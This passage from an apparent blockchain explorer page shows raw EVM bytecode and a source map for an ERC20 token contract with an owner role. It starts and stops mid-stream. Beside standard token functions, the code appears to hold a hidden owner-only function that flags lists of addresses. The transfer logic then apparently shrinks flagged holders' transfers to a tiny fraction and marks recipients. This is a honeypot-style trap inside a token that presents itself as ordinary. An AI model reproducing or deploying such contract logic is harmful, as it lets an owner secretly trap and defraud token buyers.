5050565b600060028060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600260008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610f109190611456565b10610f2557610f1e82610fc2565b9050610f29565b8190505b9392505050565b6001600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020541415610fbd5760028060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b505050565b600062066a44611b3983610fd691906119fa565b610fe09190611a83565b9050919050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611021578082015181840152602081019050611006565b83811115611030576000848401525b50505050565b6000601f19601f8301169050919050565b600061105282610fe7565b61105c8185610ff2565b935061106c818560208601611003565b61107581611036565b840191505092915050565b6000602082019050818103600083015261109a8184611047565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006110d7826110ac565b9050919050565b6110e7816110cc565b81146110f257600080fd5b50565b600081359050611104816110de565b92915050565b6000819050919050565b61111d8161110a565b811461112857600080fd5b50565b60008135905061113a81611114565b92915050565b60008060408385031215611157576111566110a2565b5b6000611165858286016110f5565b92505060206111768582860161112b565b9150509250929050565b60008115159050919050565b61119581611180565b82525050565b60006020820190506111b0600083018461118c565b92915050565b6111bf8161110a565b82525050565b60006020820190506111da60008301846111b6565b92915050565b6000806000606084860312156111f9576111f86110a2565b5b6000611207868287016110f5565b9350506020611218868287016110f5565b92505060406112298682870161112b565b9150509250925092565b600060ff82169050919050565b61124981611233565b82525050565b60006020820190506112646000830184611240565b92915050565b6000602082840312156112805761127f6110a2565b5b600061128e848285016110f5565b91505092915050565b6112a0816110cc565b82525050565b60006020820190506112bb6000830184611297565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126112e6576112e56112c1565b5b8235905067ffffffffffffffff811115611303576113026112c6565b5b60208301915083602082028301111561131f5761131e6112cb565b5b9250929050565b60008060006040848603121561133f5761133e6110a2565b5b600061134d8682870161112b565b935050602084013567ffffffffffffffff81111561136e5761136d6110a7565b5b61137a868287016112d0565b92509250509250925092565b6000806040838503121561139d5761139c6110a2565b5b60006113ab858286016110f5565b92505060206113bc858286016110f5565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061140d57607f821691505b60208210811415611421576114206113c6565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006114618261110a565b915061146c8361110a565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156114a1576114a0611427565b5b828201905092915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611508602583610ff2565b9150611513826114ac565b604082019050919050565b60006020820190508181036000830152611537816114fb565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b60006115788261110a565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8214156115ab576115aa611427565b5b600182019050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611612602683610ff2565b915061161d826115b6565b604082019050919050565b6000602082019050818103600083015261164181611605565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006116a4602483610ff2565b91506116af82611648565b604082019050919050565b600060208201905081810360008301526116d381611697565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611736602283610ff2565b9150611741826116da565b604082019050919050565b6000602082019050818103600083015261176581611729565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006117a2601d83610ff2565b91506117ad8261176c565b602082019050919050565b600060208201905081810360008301526117d181611795565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611834602583610ff2565b915061183f826117d8565b604082019050919050565b6000602082019050818103600083015261186381611827565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006118c6602383610ff2565b91506118d18261186a565b604082019050919050565b600060208201905081810360008301526118f5816118b9565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611958602683610ff2565b9150611963826118fc565b604082019050919050565b600060208201905081810360008301526119878161194b565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006119c4602083610ff2565b91506119cf8261198e565b602082019050919050565b600060208201905081810360008301526119f3816119b7565b9050919050565b6000611a058261110a565b9150611a108361110a565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615611a4957611a48611427565b5b828202905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000611a8e8261110a565b9150611a998361110a565b925082611aa957611aa8611a54565b5b82820490509291505056fea26469706673582212201ba90a85762d07b481463ecb02ab8fcbf0e21da5160f53f59f0f61a5ca55b86f64736f6c63430008090033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101005760003560e01c80638da5cb5b11610097578063db9e56d811610066578063db9e56d8146102c5578063dd62ed3e146102e1578063f2fde38b14610311578063f4e4e88c1461032d57610100565b80638da5cb5b1461022957806395d89b4114610247578063a457c2d714610265578063a9059cbb1461029557610100565b8063313ce567116100d3578063313ce567146101a157806339509351146101bf57806370a08231146101ef578063715018a61461021f57610100565b806306fdde0314610105578063095ea7b31461012357806318160ddd1461015357806323b872dd14610171575b600080fd5b61010d61035d565b60405161011a9190611080565b60405180910390f35b61013d60048036038101906101389190611140565b6103ef565b60405161014a919061119b565b60405180910390f35b61015b610412565b60405161016891906111c5565b60405180910390f35b61018b600480360381019061018691906111e0565b61041c565b604051610198919061119b565b60405180910390f35b6101a961044b565b6040516101b6919061124f565b60405180910390f35b6101d960048036038101906101d49190611140565b610454565b6040516101e6919061119b565b60405180910390f35b6102096004803603810190610204919061126a565b61048b565b60405161021691906111c5565b60405180910390f35b6102276104d4565b005b6102316104e8565b60405161023e91906112a6565b60405180910390f35b61024f610511565b60405161025c9190611080565b60405180910390f35b61027f600480360381019061027a9190611140565b6105a3565b60405161028c919061119b565b60405180910390f35b6102af60048036038101906102aa9190611140565b61061a565b6040516102bc919061119b565b60405180910390f35b6102df60048036038101906102da9190611326565b61063d565b005b6102fb60048036038101906102f69190611386565b61070e565b60405161030891906111c5565b60405180910390f35b61032b6004803603810190610326919061126a565b610795565b005b6103476004803603810190610342919061126a565b610819565b60405161035491906111c5565b60405180910390f35b60606005805461036c906113f5565b80601f0160208091040260200160405190810160405280929190818152602001828054610398906113f5565b80156103e55780601f106103ba576101008083540402835291602001916103e5565b820191906000526020600020905b8154815290600101906020018083116103c857829003601f168201915b5050505050905090565b6000806103fa610862565b905061040781858561086a565b600191505092915050565b6000600454905090565b600080610427610862565b9050610434858285610a35565b61043f858585610ac1565b60019150509392505050565b60006012905090565b60008061045f610862565b9050610480818585610471858961070e565b61047b9190611456565b61086a565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6104dc610d41565b6104e66000610dbf565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060068054610520906113f5565b80601f016020809104026020016040519081016040528092919081815260200182805461054c906113f5565b80156105995780601f1061056e57610100808354040283529160200191610599565b820191906000526020600020905b81548152906001019060200180831161057c57829003601f168201915b5050505050905090565b6000806105ae610862565b905060006105bc828661070e565b905083811015610601576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105f89061151e565b60405180910390fd5b61060e828686840361086a565b60019250505092915050565b600080610625610862565b9050610632818585610ac1565b600191505092915050565b6106456104e8565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461067c57600080fd5b60005b828290508110156107085783600260008585858181106106a2576106a161153e565b5b90506020020160208101906106b7919061126a565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555080806107009061156d565b91505061067f565b50505050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b61079d610d41565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16141561080d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161080490611628565b60405180910390fd5b61081681610dbf565b50565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614156108da576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108d1906116ba565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141561094a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109419061174c565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610a2891906111c5565b60405180910390a3505050565b6000610a41848461070e565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610abb5781811015610aad576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aa4906117b8565b60405180910390fd5b610aba848484840361086a565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610b31576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b289061184a565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610ba1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b98906118dc565b60405180910390fd5b6000610bae848484610e83565b90506000600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610c37576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c2e9061196e565b60405180910390fd5b828103600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610d2791906111c5565b60405180910390a3610d3a858585610f30565b5050505050565b610d49610862565b73ffffffffffffffffffffffffffffffffffffffff16610d676104e8565b73ffffffffffffffffffffffffffffffffffffffff1614610dbd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610db4906119da565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600060028060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600260008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610f109190611456565b10610f2557610f1e82610fc2565b9050610f29565b8190505b9392505050565b6001600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020541415610fbd5760028060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b505050565b600062066a44611b3983610fd691906119fa565b610fe09190611a83565b9050919050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611021578082015181840152602081019050611006565b83811115611030576000848401525b50505050565b6000601f19601f8301169050919050565b600061105282610fe7565b61105c8185610ff2565b935061106c818560208601611003565b61107581611036565b840191505092915050565b6000602082019050818103600083015261109a8184611047565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006110d7826110ac565b9050919050565b6110e7816110cc565b81146110f257600080fd5b50565b600081359050611104816110de565b92915050565b6000819050919050565b61111d8161110a565b811461112857600080fd5b50565b60008135905061113a81611114565b92915050565b60008060408385031215611157576111566110a2565b5b6000611165858286016110f5565b92505060206111768582860161112b565b9150509250929050565b60008115159050919050565b61119581611180565b82525050565b60006020820190506111b0600083018461118c565b92915050565b6111bf8161110a565b82525050565b60006020820190506111da60008301846111b6565b92915050565b6000806000606084860312156111f9576111f86110a2565b5b6000611207868287016110f5565b9350506020611218868287016110f5565b92505060406112298682870161112b565b9150509250925092565b600060ff82169050919050565b61124981611233565b82525050565b60006020820190506112646000830184611240565b92915050565b6000602082840312156112805761127f6110a2565b5b600061128e848285016110f5565b91505092915050565b6112a0816110cc565b82525050565b60006020820190506112bb6000830184611297565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126112e6576112e56112c1565b5b8235905067ffffffffffffffff811115611303576113026112c6565b5b60208301915083602082028301111561131f5761131e6112cb565b5b9250929050565b60008060006040848603121561133f5761133e6110a2565b5b600061134d8682870161112b565b935050602084013567ffffffffffffffff81111561136e5761136d6110a7565b5b61137a868287016112d0565b92509250509250925092565b6000806040838503121561139d5761139c6110a2565b5b60006113ab858286016110f5565b92505060206113bc858286016110f5565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061140d57607f821691505b60208210811415611421576114206113c6565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006114618261110a565b915061146c8361110a565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156114a1576114a0611427565b5b828201905092915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611508602583610ff2565b9150611513826114ac565b604082019050919050565b60006020820190508181036000830152611537816114fb565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b60006115788261110a565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8214156115ab576115aa611427565b5b600182019050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611612602683610ff2565b915061161d826115b6565b604082019050919050565b6000602082019050818103600083015261164181611605565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006116a4602483610ff2565b91506116af82611648565b604082019050919050565b600060208201905081810360008301526116d381611697565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611736602283610ff2565b9150611741826116da565b604082019050919050565b6000602082019050818103600083015261176581611729565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006117a2601d83610ff2565b91506117ad8261176c565b602082019050919050565b600060208201905081810360008301526117d181611795565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611834602583610ff2565b915061183f826117d8565b604082019050919050565b6000602082019050818103600083015261186381611827565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006118c6602383610ff2565b91506118d18261186a565b604082019050919050565b600060208201905081810360008301526118f5816118b9565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611958602683610ff2565b9150611963826118fc565b604082019050919050565b600060208201905081810360008301526119878161194b565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006119c4602083610ff2565b91506119cf8261198e565b602082019050919050565b600060208201905081810360008301526119f3816119b7565b9050919050565b6000611a058261110a565b9150611a108361110a565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615611a4957611a48611427565b5b828202905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000611a8e8261110a565b9150611a998361110a565b925082611aa957611aa8611a54565b5b82820490509291505056fea26469706673582212201ba90a85762d07b481463ecb02ab8fcbf0e21da5160f53f59f0f61a5ca55b86f64736f6c63430008090033

Deployed Bytecode Sourcemap

1446:544:3:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;919:98:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3197:197;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2008:106;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3956:286;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1856:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4637:234;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2172:125;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2457:101:0;;;:::i;:::-;;1834:85;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1130:102:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5358:427;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2493:189;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1611:246:3;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;2740:149:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2707:198:0;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;1863:125:3;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;919:98:1;973:13;1005:5;998:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;919:98;:::o;3197:197::-;3280:4;3296:13;3312:12;:10;:12::i;:::-;3296:28;;3334:32;3343:5;3350:7;3359:6;3334:8;:32::i;:::-;3383:4;3376:11;;;3197:197;;;;:::o;2008:106::-;2069:7;2095:12;;2088:19;;2008:106;:::o;3956:286::-;4083:4;4099:15;4117:12;:10;:12::i;:::-;4099:30;;4139:38;4155:4;4161:7;4170:6;4139:15;:38::i;:::-;4187:27;4197:4;4203:2;4207:6;4187:9;:27::i;:::-;4231:4;4224:11;;;3956:286;;;;;:::o;1856:91::-;1914:5;1938:2;1931:9;;1856:91;:::o;4637:234::-;4725:4;4741:13;4757:12;:10;:12::i;:::-;4741:28;;4779:64;4788:5;4795:7;4832:10;4804:25;4814:5;4821:7;4804:9;:25::i;:::-;:38;;;;:::i;:::-;4779:8;:64::i;:::-;4860:4;4853:11;;;4637:234;;;;:::o;2172:125::-;2246:7;2272:9;:18;2282:7;2272:18;;;;;;;;;;;;;;;;2265:25;;2172:125;;;:::o;2457:101:0:-;1727:13;:11;:13::i;:::-;2521:30:::1;2548:1;2521:18;:30::i;:::-;2457:101::o:0;1834:85::-;1880:7;1906:6;;;;;;;;;;;1899:13;;1834:85;:::o;1130:102:1:-;1186:13;1218:7;1211:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1130:102;:::o;5358:427::-;5451:4;5467:13;5483:12;:10;:12::i;:::-;5467:28;;5505:24;5532:25;5542:5;5549:7;5532:9;:25::i;:::-;5505:52;;5595:15;5575:16;:35;;5567:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;5686:60;5695:5;5702:7;5730:15;5711:16;:34;5686:8;:60::i;:::-;5774:4;5767:11;;;;5358:427;;;;:::o;2493:189::-;2572:4;2588:13;2604:12;:10;:12::i;:::-;2588:28;;2626;2636:5;2643:2;2647:6;2626:9;:28::i;:::-;2671:4;2664:11;;;2493:189;;;;:::o;1611:246:3:-;1720:7;:5;:7::i;:::-;1706:21;;:10;:21;;;1697:32;;;;;;1744:9;1739:112;1763:6;;:13;;1759:1;:17;1739:112;;;1826:14;1797:15;:26;1813:6;;1820:1;1813:9;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;1797:26;;;;;;;;;;;;;;;:43;;;;1778:3;;;;;:::i;:::-;;;;1739:112;;;;1611:246;;;:::o;2740:149:1:-;2829:7;2855:11;:18;2867:5;2855:18;;;;;;;;;;;;;;;:27;2874:7;2855:27;;;;;;;;;;;;;;;;2848:34;;2740:149;;;;:::o;2707:198:0:-;1727:13;:11;:13::i;:::-;2815:1:::1;2795:22;;:8;:22;;;;2787:73;;;;;;;;;;;;:::i;:::-;;;;;;;;;2870:28;2889:8;2870:18;:28::i;:::-;2707:198:::0;:::o;1863:125:3:-;1929:7;1955:15;:26;1971:9;1955:26;;;;;;;;;;;;;;;;1948:33;;1863:125;;;:::o;587:96:0:-;640:7;666:10;659:17;;587:96;:::o;9590:370:1:-;9738:1;9721:19;;:5;:19;;;;9713:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9818:1;9799:21;;:7;:21;;;;9791:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9900:6;9870:11;:18;9882:5;9870:18;;;;;;;;;;;;;;;:27;9889:7;9870:27;;;;;;;;;;;;;;;:36;;;;9937:7;9921:32;;9930:5;9921:32;;;9946:6;9921:32;;;;;;:::i;:::-;;;;;;;;9590:370;;;:::o;10241:441::-;10371:24;10398:25;10408:5;10415:7;10398:9;:25::i;:::-;10371:52;;10457:17;10437:16;:37;10433:243;;10518:6;10498:16;:26;;10490:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;10600:51;10609:5;10616:7;10644:6;10625:16;:25;10600:8;:51::i;:::-;10433:243;10361:321;10241:441;;;:::o;6238:837::-;6380:1;6364:18;;:4;:18;;;;6356:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;6456:1;6442:16;;:2;:16;;;;6434:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;6509:15;6527:38;6548:4;6554:2;6558:6;6527:20;:38::i;:::-;6509:56;;6576:19;6598:9;:15;6608:4;6598:15;;;;;;;;;;;;;;;;6576:37;;6646:6;6631:11;:21;;6623:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;6761:6;6747:11;:20;6729:9;:15;6739:4;6729:15;;;;;;;;;;;;;;;:38;;;;6961:7;6944:9;:13;6954:2;6944:13;;;;;;;;;;;;;;;;:24;;;;;;;;;;;7009:2;6994:26;;7003:4;6994:26;;;7013:6;6994:26;;;;;;:::i;:::-;;;;;;;;7031:37;7051:4;7057:2;7061:6;7031:19;:37::i;:::-;6346:729;;6238:837;;;:::o;1992:130:0:-;2066:12;:10;:12::i;:::-;2055:23;;:7;:5;:7::i;:::-;:23;;;2047:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;1992:130::o;3059:187::-;3132:16;3151:6;;;;;;;;;;;3132:25;;3176:8;3167:6;;:17;;;;;;;;;;;;;;;;;;3230:8;3199:40;;3220:8;3199:40;;;;;;;;;;;;3122:124;3059:187;:::o;12153:327:1:-;12278:7;12374:1;12351:15;:19;12367:2;12351:19;;;;;;;;;;;;;;;;12327:15;:21;12343:4;12327:21;;;;;;;;;;;;;;;;:43;;;;:::i;:::-;:48;12323:151;;12398:21;12412:6;12398:13;:21::i;:::-;12391:28;;;;12323:151;12457:6;12450:13;;12153:327;;;;;;:::o;11270:180::-;11415:1;11392:15;:19;11408:2;11392:19;;;;;;;;;;;;;;;;:24;11388:56;;;11441:1;11419:15;:19;11435:2;11419:19;;;;;;;;;;;;;;;:23;;;;11388:56;11270:180;;;:::o;11477:92::-;11533:7;11561:6;11554:4;11550:1;:8;;;;:::i;:::-;:17;;;;:::i;:::-;11543:24;;11477:92;;;:::o;7:99:4:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:307::-;355:1;365:113;379:6;376:1;373:13;365:113;;;464:1;459:3;455:11;449:18;445:1;440:3;436:11;429:39;401:2;398:1;394:10;389:15;;365:113;;;496:6;493:1;490:13;487:101;;;576:1;567:6;562:3;558:16;551:27;487:101;336:258;287:307;;;:::o;600:102::-;641:6;692:2;688:7;683:2;676:5;672:14;668:28;658:38;;600:102;;;:::o;708:364::-;796:3;824:39;857:5;824:39;:::i;:::-;879:71;943:6;938:3;879:71;:::i;:::-;872:78;;959:52;1004:6;999:3;992:4;985:5;981:16;959:52;:::i;:::-;1036:29;1058:6;1036:29;:::i;:::-;1031:3;1027:39;1020:46;;800:272;708:364;;;;:::o;1078:313::-;1191:4;1229:2;1218:9;1214:18;1206:26;;1278:9;1272:4;1268:20;1264:1;1253:9;1249:17;1242:47;1306:78;1379:4;1370:6;1306:78;:::i;:::-;1298:86;;1078:313;;;;:::o;1478:117::-;1587:1;1584;1577:12;1601:117;1710:1;1707;1700:12;1724:126;1761:7;1801:42;1794:5;1790:54;1779:65;;1724:126;;;:::o;1856:96::-;1893:7;1922:24;1940:5;1922:24;:::i;:::-;1911:35;;1856:96;;;:::o;1958:122::-;2031:24;2049:5;2031:24;:::i;:::-;2024:5;2021:35;2011:63;;2070:1;2067;2060:12;2011:63;1958:122;:::o;2086:139::-;2132:5;2170:6;2157:20;2148:29;;2186:33;2213:5;2186:33;:::i;:::-;2086:139;;;;:::o;2231:77::-;2268:7;2297:5;2286:16;;2231:77;;;:::o;2314:122::-;2387:24;2405:5;2387:24;:::i;:::-;2380:5;2377:35;2367:63;;2426:1;2423;2416:12;2367:63;2314:122;:::o;2442:139::-;2488:5;2526:6;2513:20;2504:29;;2542:33;2569:5;2542:33;:::i;:::-;2442:139;;;;:::o;2587:474::-;2655:6;2663;2712:2;2700:9;2691:7;2687:23;2683:32;2680:119;;;2718:79;;:::i;:::-;2680:119;2838:1;2863:53;2908:7;2899:6;2888:9;2884:22;2863:53;:::i;:::-;2853:63;;2809:117;2965:2;2991:53;3036:7;3027:6;3016:9;3012:22;2991:53;:::i;:::-;2981:63;;2936:118;2587:474;;;;;:::o;3067:90::-;3101:7;3144:5;3137:13;3130:21;3119:32;;3067:90;;;:::o;3163:109::-;3244:21;3259:5;3244:21;:::i;:::-;3239:3;3232:34;3163:109;;:::o;3278:210::-;3365:4;3403:2;3392:9;3388:18;3380:26;;3416:65;3478:1;3467:9;3463:17;3454:6;3416:65;:::i;:::-;3278:210;;;;:::o;3494:118::-;3581:24;3599:5;3581:24;:::i;:::-;3576:3;3569:37;3494:118;;:::o;3618:222::-;3711:4;3749:2;3738:9;3734:18;3726:26;;3762:71;3830:1;3819:9;3815:17;3806:6;3762:71;:::i;:::-;3618:222;;;;:::o;3846:619::-;3923:6;3931;3939;3988:2;3976:9;3967:7;3963:23;3959:32;3956:119;;;3994:79;;:::i;:::-;3956:119;4114:1;4139:53;4184:7;4175:6;4164:9;4160:22;4139:53;:::i;:::-;4129:63;;4085:117;4241:2;4267:53;4312:7;4303:6;4292:9;4288:22;4267:53;:::i;:::-;4257:63;;4212:118;4369:2;4395:53;4440:7;4431:6;4420:9;4416:22;4395:53;:::i;:::-;4385:63;;4340:118;3846:619;;;;;:::o;4471:86::-;4506:7;4546:4;4539:5;4535:16;4524:27;;4471:86;;;:::o;4563:112::-;4646:22;4662:5;4646:22;:::i;:::-;4641:3;4634:35;4563:112;;:::o;4681:214::-;4770:4;4808:2;4797:9;4793:18;4785:26;;4821:67;4885:1;4874:9;4870:17;4861:6;4821:67;:::i;:::-;4681:214;;;;:::o;4901:329::-;4960:6;5009:2;4997:9;4988:7;4984:23;4980:32;4977:119;;;5015:79;;:::i;:::-;4977:119;5135:1;5160:53;5205:7;5196:6;5185:9;5181:22;5160:53;:::i;:::-;5150:63;;5106:117;4901:329;;;;:::o;5236:118::-;5323:24;5341:5;5323:24;:::i;:::-;5318:3;5311:37;5236:118;;:::o;5360:222::-;5453:4;5491:2;5480:9;5476:18;5468:26;;5504:71;5572:1;5561:9;5557:17;5548:6;5504:71;:::i;:::-;5360:222;;;;:::o;5588:117::-;5697:1;5694;5